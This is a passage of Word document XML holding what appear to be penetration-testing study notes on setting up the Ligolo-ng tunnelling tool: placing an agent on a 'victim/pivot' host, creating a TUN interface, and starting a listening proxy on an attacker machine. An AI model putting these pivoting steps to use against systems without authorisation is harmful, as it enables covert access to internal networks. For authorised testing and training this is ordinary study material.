      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For your setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali attacker → download </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary (Linux version).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ligolo-ng_proxy_</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.8.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_linux_amd64.tar.gz </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On victim/pivot → upload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">agent </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary (Windows or Linux depending on the target).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo-ng_agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_0.8.2_</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows_amd64.zip </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="592"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unzip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar -xvzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz -C ligolo   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it's a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .tar.gzip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can unzip it using this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x = extract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v = verbose (shows files being extracted)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">z = unzip for .gz </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f = file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-C  ligolo = unzip into ligolo folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip ligolo-ng_agent_0.8.2_windows_amd64.zip -d ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump contents into ligolo directory</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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then on your Kali (or if your victim is a Linux), make it executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="615"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4gwilwxd1wmm" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adds a new tun interface to our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip tuntap add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ creates a new TUN/TAP interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → assigns ownership of this interface to the user kali (so you don’t always need root to manage it).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mode tun </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ creates a TUN interface (layer 3, IP packets). If it was tap, it would operate at layer 2 (Ethernet frames).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="348"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → name of the new virtual network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables the new interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → manages the state of a network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ the interface name you just created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ activates/enables the interface (otherwise it’s down and unusable).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./proxy -selfcert -laddr 0.0.0.0:4443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used port 4443 here instead of 443 since port 443 is important for tools like tcpdump. But if port 4443 doesn’t work, use other common ports like SMB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="727"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
